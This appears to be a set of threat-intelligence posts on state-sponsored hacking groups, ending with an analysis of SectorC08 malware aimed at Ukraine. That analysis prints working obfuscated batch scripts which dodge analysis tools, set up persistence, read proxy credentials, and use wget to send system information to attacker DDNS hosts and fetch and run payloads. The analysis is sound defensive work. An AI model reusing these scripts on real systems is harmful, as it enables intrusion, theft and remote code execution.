They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “avpia.exe” file. When the victim executes this renamed “avpia.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 17 – Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)

The SectorF01 group used the normal “plugins-setup.exe” (Kaspersky Light Plugin Extension Registrar) to utilize the “DLL Side-Loading” technique. The normal “plugins-setup.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “plugins-setup.exe” file. When the victim executes this renamed “plugins-setup.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 18 – Avast Antivirus remediation (wsc_proxy.exe)

The SectorF01 group used the normal “wsc_proxy.exe” (Avast Antivirus remediation) to utilize the “DLL Side-Loading” technique. The normal “wsc_proxy” file loads a “wsc.dll” DLL file.

They set the file name of their malicious DLL to be “wsc.dll” and deploy it in the same path along with the renamed normal “wsc_proxy.exe” file. When the victim executes this renamed “wsc_proxy.exe”, the malicious “wsc.dll” file is loaded and malware is executed.

The lures related to South Korea

The SectorF01 group used more than 800 malwares for about seven years and used keywords related to various countries. We will summarize the attacks that contain keywords related to South Korea among those malwares. They mainly attacked countries in Southeast Asia; however, a Japanese automobile company, one of the East Asian countries, is likely to have been attacked by the SectorF01 group recently as well, and similar malware have been found at a similar time, which we suspect to be related to a South Korean automobile company.

We cannot be sure that this attack was carried out on South Korea just because it contained keywords related to South Korea. However, the SectorF01 group is using subjects related to South Korea in their attack, and it is possible that the attack was directly or indirectly related to South Korea. The SectorF01 group has carried out a number of attacks against foreign companies that have entered Vietnam, and so there is a possibility that South Korean companies may be targeted.

Lure 1 – Hyundai Thành Công

There is one malware that the SectorF01 group used in January 2019 to attack specific targets using the “DLL Side-Loading” technique. The file name of the malware used in this attack is “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe”. “Huyndai” in the file name is likely to be a typo of “Hyundai”. “Hyundai – Thanh Cong (Hyundai Thành Công)” is a joint venture established by a South Korean automobile company in cooperation with a large Vietnamese company.

Malware distributed using the subject of “Huyndai [sic] – Thanh Cong”
“HYUNDAI THANH CONG” Website

Both “wwlib.dll” and the following normal document are executed, causing the user to believe that the document is executed as per normal, without loading any executable file.

Normal document executed by “wwlib.dll”

Lure 2 – Cambodia National Rescue Party in Republic of Korea

There is a malicious document called “FW Report on demonstration of former CNRP in Republic of Korea.doc” that the SectorF01 group used to attack using “CVE-2017-11882” vulnerability in July 2018. “CNRP” in the file name is likely to be an abbreviation of “Cambodia National Rescue Party”, and there are many supporters of the Cambodia National Rescue Party (CNRP) in South Korea. Indeed, in April 2019, thousands of CNRP supporters gathered in Gwangju, South Korea, to protest the liberation of democracy in Cambodia.

“CNRP” supporters’ demonstrations in Gwangju,Korea, The Phnom Penh Post

When executing the document, the malware is executed by the vulnerability “CVE-2017-11882”. The following screen is displayed when the document is viewed.

“FW Report on demonstration of former CNRP in Republic of Korea.doc” document

Lure 3 – KoreanTimesSSK Font

The SectorF01 group attacked using fonts as lure subjects and pretends to be a font management program or font file. They seem to utilize font-related programs in attacks because most of the countries that the group attacks have a non-English native language and they have to use various fonts accordingly. The SectorF01 group used a file disguised as a Korean font in June 2017, and the “KoreanTimesSSK” font used in the attack was a Korean font created by Southern Software.

Conclusion

We have traced the SectorF01 group, which has been steadily conducting cyber espionage activities in Southeast Asia for the past seven years, and examined their initial penetration methods. They conduct hacking activities against neighboring countries and opposition forces in order to maintain their own regime and economic profit. It is likely that it is hacking at the national level for the benefit of the state and recently also hacking other industries such as the automobile industries of more advanced countries to contribute to the industrial development of their own country. These attacks are spreading to the East Asian region, which is a huge threat to the neighboring countries as well as to the national institutions.

The scope of activities and number of malware that the group uses every year for attacks is increasing, and we need to understand them more and prepare for their attacks. We should be prepared to effectively detect and respond to their attacks through steady threat hunting and intelligence activities.

Indicators of Compromise

The IOCs containing the malware hashes (827 total) that the SectorF01 group used from 2013 until end of the June 2019 for cyber espionage can be found here.

More information about the SectorF01 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Drive-by Compromise
Exploit Public-Facing Application
Spearphishing Attachment
Spearphishing Link
Valid Accounts

Execution

Command-Line Interface
Compiled HTML File
Control Panel Items
Execution through API
Execution through Module Load
Exploitation for Client Execution
Mshta
PowerShell
Regsvr32
Rundll32
Scheduled Task
Scripting
Service Execution
Signed Script Proxy Execution
Trusted Developer Utilities
User Execution
Windows Management Instrumentation

Persistence

Component Object Model Hijacking
DLL Search Order Hijacking
Hidden Files and Directories
Modify Existing Service
New Service
Office Application Startup
Registry Run Keys / Startup Folder
Scheduled Task
Valid Accounts
Web Shell

Privilege Escalation

Bypass User Account Control
DLL Search Order Hijacking
Exploitation for Privilege Escalation
New Service
Process Injection
Scheduled Task
Valid Accounts
Web Shell

Defense Evasion

Binary Padding
Bypass User Account Control
Compiled HTML File
Component Object Model Hijacking
Control Panel Items
Deobfuscate/Decode Files or Information
DLL Search Order Hijacking
DLL Side-Loading
File Deletion
File Permissions Modification
Hidden Files and Directories
Indicator Removal on Host
Masquerading
Modify Registry
Mshta
NTFS File Attributes
Obfuscated Files or Information
Process Injection
Regsvr32
Rundll32
Scripting
Signed Script Proxy Execution
Software Packing
Template Injection
Timestomp
Trusted Developer Utilities
Valid Accounts
Virtualization/Sandbox Evasion
Web Service

Credential Access

Credential Dumping
Input Capture
Network Sniffing

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Sniffing
Process Discovery
Query Registry
Remote System Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Application Deployment Software
Distributed Component Object Model
Exploitation of Remote Services
Pass the Hash
Pass the Ticket
Remote File Copy
Windows Admin Shares

Collection

Automated Collection
Data from Local System
Input Capture
Man in the Browser
Screen Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Data Encoding
Data Obfuscation
Domain Generation Algorithms
Multi-Stage Channels
Multiband Communication
Remote File Copy
Standard Application Layer Protocol
Uncommonly Used Port
Web Service

Exfiltration

Data Compressed
Data Encrypted
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Impact

Transmitted Data Manipulation

Monthly Threat Actor Group Intelligence Report, May 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from April 21 to May 20, 2019.

1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA07 were found among SectorA hacking groups this May. Analysis of the hacking campaigns of SectorA groups over a long period of time reveals that SectorA02, SectorA05 and the newly defined SectorA07 are the most active. The increase in activity of these three groups means that the strategy, hacking purpose and direction of the entire SectorA groups are clarified. In addition, it means that the goals of each group in SectorA is now clear.

In the past, SectorA02 and Sector05 groups conducted hacking campaigns to collect advanced information related to Korea. However, these groups are currently conducting hacking campaigns to gather information on political activities in Europe, North America, and Southeast Asia, where countries that can influence the political and diplomatic activities of the SectorA government are located.

In May, the newly defined SectorA07 group was a small subgroup of the larger existing SectorA05 group. As a result of analyzing their hacking campaigns, we found that the SectorA07 group is active only for the purpose of collecting financial information from companies located in countries such as South Korea and Southeast Asia.

The SectorA02 group uses the most diverse hacking strategies and techniques in SectorA. They develop and utilize a variety of hacking strategies and techniques such as simple phishing attacks, spear phishing attacks with malware, and sophisticated social engineering techniques using KakaoTalk (a popular messenger in South Korea). On the other hand, SectorA05 and SectorA07 focused on utilizing spear phishing, which was used frequently in the past, for initial access. They use Microsoft Word or HWP file format malware selectively depending on their target victim.

We observe that SectorA is targeting specific countries less and now gathering political and economic activity information of various countries related to the SectorA government and capturing financial information in a variety of non-specific countries and regions.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In May, a total of four hacking groups were found to be active in SectorB.

In the Middle East and Southeast Asia, the activity of SectorB01 which had a low activity frequency over the past period has started to increase. The SectorB01 group used Microsoft Word files containing code execution vulnerabilities to execute malware. These files were attached to their spear phishing emails, and this technique was frequently used by other SectorB groups in the past. In May, the SectorB01 group was also found using malware that runs on the Linux operating system and it seems they are preparing their capabilities for attacks on various operating systems.

The SectorB03 group, mainly acting in North America, used the remote code execution vulnerability CVE-2019-0604 to attack Microsoft SharePoint servers, which was not used by other hacking groups in the past. They attempted to exploit the vulnerability in order to penetrate the internal network by uploading a WebShell to the target server.

SectorB09 group mainly operates in East Asia, and they use malware with characteristics similar to those used in the past. However, they are using a new hacking technique as they are masquerading their malware as a setup file of a commercial cloud service and then distributing malware to specific targets.

The SectorB16 group, acting mainly in Europe and Southeast Asia, uses only open source tools and known existing vulnerabilities. This characteristics make it more difficult to detect their hacking activity.

SectorB groups are likely to conduct hacking activities to seize relevant diplomatic information as part of a recent trade war with the United States. As a result, the frequency of SectorB group hacking campaigns is expected to increase.

3. SectorC Activity Features

In May, a total of three hacking groups were found among the SectorC groups. They perform hacking activities mainly in Europe, South America, and Eastern Europe where political friction is frequent.

The SectorC01 group mainly utilized malware recently produced in the GO language for this month. This seems to be a strategic choice because the GO programming language has heterogeneous portability and high utilization.

The SectorC02 group installs information-collecting malware which targets Microsoft Exchange Servers. This is similar to malware used in hacking campaigns in countries located in Europe in the past, and seems to be aimed at stealing e-mail information that can be used for various purposes.

The SectorC08 group conducts intensive hacking activities targeting countries in Eastern Europe where political friction continues. The malicious code found in May was in the form of an executable compressed file, 7ZipSFX, which has the characteristics of using both script files and known normal files together. This is similar to the activities of the SectorC08 group found in the past.

4. SectorD Activity Features

In May, a total of two hacking groups were found among SectorD groups. They perform hacking activities mainly on other Middle Eastern countries which they have political tensions with.

The SectorD01 group mainly conducted hacking activities for the purpose of collecting information using spear phishing emails with Microsoft Excel files that contain malicious macros, and malware using AutoHotKey and TeamViewer, both of which they have not used in the past.

The SectorD02 group also conducted hacking campaigns in the Middle East. They used spear phishing with malware for initial access, just like most other Sector groups. Recently, they used open-source penetration testing tools in their attacks, which seems to be an attempt to not leave traces of attack activity.

5. SectorE Activity Features

In May, a total of three hacking groups were found among SectorE groups. They perform hacking activities mainly against their rival countries in Central Asian, including Pakistan.

The SectorE02 group typically used spear phishing emails with an attached Microsoft Excel document with malicious macro scripts for initial access.

The SectorE05 group also used Microsoft Word malware for hacking activities, with the internals of these Word files including two files with OLE structures and two files with executable file structures.

Hacking campaigns of SectorE hacking groups have been concentrated against their competitor countries after a military physical conflict with a political rival country. Due to this political situation, the hacking campaigns of SectorE groups are expected to continue.

6. SectorF Activity Features

In May, the SectorF01 group mainly operated against China, Thailand, Cambodia and India. In addition, hacking campaigns targeting Japan automotive companies located in Southeast Asia were also found.

The SectorF01 group uses a variety of attack methods constantly: executable files disguised as document file icons, MS Word documents containing VBA macro scripts, RTF files exploiting the CVE-2017-11882 vulnerability, and WinRAR ACE Vulnerability (CVE-2018-20250). Recent hacking activities of the SectorF01 group seems to be for different purposes from the past, as they now also hack various countries and organizations for the economic development of their own country as opposed to only for political and military information.

This type of hacking activity is similar to previous attempts of another sector, SectorB, to collect technology information of Western countries in order advance their own technology and economic development. It appears that the SectorF01 group will continue to target various advanced countries and high technology industries for these purposes.

7. Cyber Crime Groups Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In May, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ04 group were mainly found in Italy, Korea, Romania, South Africa and India, and are targeted at major companies in the financial industry such as banks. The group mainly uses malware in the form of an MS Excel file containing macros script and they are using different malware and strategies across Europe and Asia.

The SectorJ09 group hacking activities observed were for hijacking credit card payment information for e-commerce platforms used in online stores in North America and universities in the US and Canada.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorC08: Multi-Layered SFX in Recent Campaigns Target Ukraine

Overview

Unlike other state sponsored threat actors, SectorC08 appears to be only concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013 and up till today their modus operandi in their initial stages of operation has not changed much.

We analyzed over 50 of their executable malware files found very recently in order to look at similarities, differences, and outliers. We found that while a few samples still used SectorC08’s executable file structure which contained batch scripts which were split out into many files (e.g. Wariables.cmd) or batch scripts together with a decoder executable and an encoded executable, most of them followed the structure we will be detailing below.

Example of a Typical First Stage Structure (a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)

All samples which we can confirm came in the months of May and June used the same structure in their malware which we will be describing below: a 7zSFX archive which opens a password protected WinRARSFX archive, which then attempts to use a version of wget to download its third stage malware which is another WinRARSFX archive such as UltraVNC.

Fake Documents

Some of the malware samples we found contained an embedded fake document in them pertaining to Ukrainian issues. We observed six such embedded fake documents which were sometimes reused against different targets. These documents are opened from the embedded batch file in the 7zSFX archive environment.

Example of files embedded in a 7zSFX archive. “6710” is the embedded fake document here.

The batch file is always the file which SectorC08 set to be ran after the 7zSFX archive is executed, and the way the file distracts the victim while it performs its malicious activity is to open up a fake document from that batch file.

<18974.cmd> – Commands Related to Opening Fake Document
… set CHeqCJB=Document … set EhFWXVK=6710 … copy /y “%EhFWXVK%” “%CHeqCJB%.docx” … “%CD%\%CHeqCJB%.docx” …

The fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or police issues.

By comparing the document content date to the malware internal versioning code (described later) and from our knowledge of the malware’s previous versioning codes and dates, we can conclude that when the malware internal versioning code corresponds to a date, it is at least a roughly accurate timestamp and we can create a partial timeline of events.

For example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message where the version code “24.05” (24th May) appeared thrice and “prok” and “27” appeared once each.

Basic Anti-Analysis

At the start of this batch script, the malware looks for Wireshark and Process Explorer using the TaskList command. If any of these exist, the script exits using an unspecified label “exit”. But due to an error in their programming logic, this does not actually do everything which the attacker thinks it does.

<18974.cmd> – Basic Anti-Analysis
… For %%g In (wireshark procexp) do ( TaskList /FI “ImageName EQ %%g.exe” | Find /I “%%g.exe” ) If %ErrorLevel% NEQ 1 goto exit …

While looking for Wireshark and Process Explorer were consistent across their malware samples, we also found singular instances where the malware was also checking for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf) and an old different malware family sample of SectorC08’s which also checked whether the machine’s username was a known sandbox username such as “TEQUILABOOMBOOM” or “MALWARETEST” (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).

<statecrypt.cmd> – Checking for usernames such as “TEQUILABOOMBOOM”
… Set ProcessName=wireshark.exe TaskList /FI “ImageName EQ %ProcessName%” | Find /I “%ProcessName%” If %ErrorLevel% NEQ 1 goto hotlog set name=%username% if “%name%”==”MALTEST” goto hotlog if “%name%”==”MALWARETEST” goto hotlog if “%name%”==”TEQUILABOOMBOOM” goto hotlog if “%name%”==”SANDBOX” goto hotlog if “%name%”==”VIRUS” goto hotlog if “%name%”==”MALWARE” goto hotlog if “%name%”==”MALWARES” goto hotlog if “%name%”==”TEST” goto hotlog if “%name%”==”TROYAN” goto hotlog … :hotlog ping 127.0.0.1 taskkill /f /im mshta.exe for /r “%TEMP%” %%d in (.) do dir /b “%%~d” | find /v “”>nul || rd /s /q “%%~d” del /f /q “%CD%\*.vbs” del /f /q “%CD%\*.exe” del /f /q “%CD%\*.cmd” exit

First Stage Persistence

In this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a shortcut link to run “%USERPROFILE%\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document (6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that the second stage executable is getting renamed and moved to “%USERPROFILE%\winver.exe”, then the shortcut file is being moved to “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\winver.lnk” for persistence.

<18974.cmd> – Commands Related to Persistence
… set KsEEKky=”%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” … set “EbnMNIJ=%USERPROFILE%” … set UDWwujG=winver … set GLUymyw=5610 … copy /y “%GLUymyw%” “%EbnMNIJ%\%UDWwujG%.exe” … copy /y “11666” %KsEEKky%\%UDWwujG%.lnk …

Sample Second Stage (EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)

In many recent cases, their second stage is a password protected WinRARSFX which contains a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be ran, and a renamed version of wget.

The second stage WinRARSFX archive

In this example, we see that the password used to open the second stage is “uyjqystgblfhs”. While SectorC08 sometimes changes the WinRARSFX password (or simply uses another 7zSFX unprotected archive), we observed this particular password being used at least 11 times across their various malware samples. This shows that while they have likely automated parts of their process for building these batch scripts, a lot of it is still completely manual.

<18974.cmd> – Commands Related to Second Stage Password
… set “EbnMNIJ=%USERPROFILE%” … set UDWwujG=winver … set GLUymyw=5610 … set cjhIZDS=uyjqystgblfhs … taskkill /f /im %UDWwujG%.exe … copy /y “%GLUymyw%” “%EbnMNIJ%\%UDWwujG%.exe” … start “” %EbnMNIJ%\%UDWwujG%.exe -p%cjhIZDS% …

Second Stage Persistence and Wget

After the first stage, the 7zSFX archive always eventually acts as a downloader in the second stage, launching various versions of wget in order to download its third stage.

<11009.cmd> – Full Contents
@echo off if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% chcp 1251>NUL set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn setlocal enabledelayedexpansion if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set “qwoMlMx=HKCU\Software” set SbTrL=%SgJyn%*whAWq-%atpVW% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set “CnGKehh=Microsoft\Windows” set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set “XCEEJVi=CurrentVersion\Internet Settings” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set GMXXMeP=”%qwoMlMx%\%CnGKehh%\%XCEEJVi%” set SbTrL=%SgJyn%*whAWq-%atpVW% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn For /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyServer”`) do set BtRtCGM=%%o if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% For /F “UseBackQ Tokens=2*” %%u In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyUser”`) do set tBUCICm=%%v if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq For /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyPass”`) do set BwtKgWA=%%o set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% For /F “skip=1 Tokens=4*” %%u In (‘vol c:’) Do set KsEEKky=%%u if %KsEEKky%==is ( For /F “skip=1 Tokens=5*” %%v In (‘vol c:’) Do set KsEEKky=%%v ) if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set EbnMNIJ=22.05 set SbTrL=%SgJyn%*whAWq-%atpVW% set per_24=%computername% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set DOHVFwJ=0 if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=%SgJyn%*whAWq-%atpVW% systeminfo > UDWwujG if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq FOR /F “tokens=*” %%n IN (UDWwujG) do @IF NOT i%%n==i set CHeqCJB=!CHeqCJB!%%n+### set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set SbTrL=%SgJyn%*whAWq-%atpVW% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set NFJOtqt=%computername%_%KsEEKky:-=% set SbTrL=%SgJyn%*whAWq-%atpVW% set eNSzFCv=http if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=%SgJyn%*whAWq-%atpVW% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set FbNZKeg=wincreator set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set HIngDXg=ddns.net if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=%SgJyn%*whAWq-%atpVW% set GLUymyw=jasfix set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set “cjhIZDS=%APPDATA%\Microsoft\IE” if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set ViKDbBD=MicrosoftCreate if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=%SgJyn%*whAWq-%atpVW% set BDwSMJD=weristotal if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set NOdKmih=winusers if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set flkpgez=bitvers set per_23=”Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64″ if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq MD “%cjhIZDS%” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% copy “%ViKDbBD%.exe” “%cjhIZDS%\%BDwSMJD%.exe” /y set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq schtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr “%cjhIZDS%\%BDwSMJD%.exe -b -c -t 5 ‘%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe’ -P ‘%USERPROFILE%'” set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% schtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr “%USERPROFILE%\%NOdKmih%.exe” if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if defined BtRtCGM ( schtasks /Create /SC MINUTE /MO 31 /F /tn %BDwSMJD%_%KsEEKky:-=%_03 /tr “%cjhIZDS%\%BDwSMJD%.exe -e http_proxy=http://%BtRtCGM% –proxy-user=%tBUCICm% –proxy-password=%BwtKgWA% -b -c -t 3 ‘%eNSzFCv%://%flkpgez%.%HIngDXg%/%NFJOtqt%/%NOdKmih%.exe’ -P ‘%USERPROFILE%'” ) if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% :KTmZDZR set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% set /a xTBHxRg=39*%RANDOM%/32768 if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% ping -n 10 127.0.0.1 if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn timeout /t %xTBHxRg% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% taskkill /f /im %ViKDbBD%.exe if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn set SbTrL=%SgJyn%*whAWq-%atpVW% %ViKDbBD%.exe –user-agent=%per_23% –post-data=”versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%” “%EhFWXVK%” -q -N %EhFWXVK% -O %GLUymyw%.exe set SbTrL=%SgJyn%*whAWq-%atpVW% if defined BtRtCGM ( %ViKDbBD%.exe –user-agent=%per_23% -e http_proxy=http://%BtRtCGM% –proxy-user=%tBUCICm% –proxy-password=%BwtKgWA% –post-data=”versiya=%EbnMNIJ: =%&comp=%per_24%&id=%NFJOtqt: =%&sysinfo=%CHeqCJB%” “%EhFWXVK%” -q -N %EhFWXVK% -O %GLUymyw%.exe ) ping -n 5 127.0.0.1 if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% set /a zDGBFmh=0 set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% for %%o in (%GLUymyw%.exe) do (set /a zDGBFmh=%%~Zo) if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq if %zDGBFmh% GEQ 50002 call :FdLHKss set SbTrL=%SgJyn%*whAWq-%atpVW% set /a xTBHxRg=30*%RANDOM%/32768 if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% ping -n 5 microsoft.com set SbTrL=%SgJyn%*whAWq-%atpVW% set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% goto KTmZDZR if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL% :FdLHKss start “” “%GLUymyw%.exe” if SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn ping -n 11 google.com.ua set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn% del /q /f “%GLUymyw%.exe” if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq exit /b set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%

From the sample contents below, we can see that MicrosoftCreate.exe (some version of wget) is being renamed and moved to “%APPDATA%\Microsoft\IE\weristotal.exe”. This weristotal.exe is then set to download an EXE file from hxxp://bitvers[.]ddns[.]net/<computerinfo>/winusers.exe in a scheduled task which is then executed in another scheduled task. The scheduled task to perform the download happens every 30 minutes, and this is important to note because SectorC08’s servers very often returns a HTTP 403 Forbidden error instead of the requested file.

Separately, the original MicrosoftCreate.exe also attempts to download another executable, jasfix.exe in this case, from hxxp://wincreator[.]ddns[.]net/<computerinfo>/winusers.exe. While both of these wget downloads are to different DDNS servers, both servers point to the same IP addresses and the same file paths, meaning that it is also a form of redundancy for SectorC08.

In order to identify victims, fields sent in the wget command include the “comp” field (containing %computername% environment variable) and the “sysinfo” field (containing the entire contents of the systeminfo command). All of these are sent in the clear using HTTP.

Another interesting area to note from how they run wget is the user-agent used and the “versiya” (version) field in the post-data. While the user-agent is left as the default wget user agent about half the time, at other times various and even unusual user-agent strings are used which suggests that SectorC08 sometimes knows which user-agent strings are used or likely to be used in the victim environment.

Version CodeUser-Agent
07.05Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36
13.05Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
13.05Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1
21.05 Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36
21.05Mozilla/5.0 (X11; Linux x86_64) Safari/537.36
23.05Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
23.05 Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64
24.05 Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36
24.05 Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112
U_04 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
USB_04Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
USB_07 Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
USB_08Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
%1_401
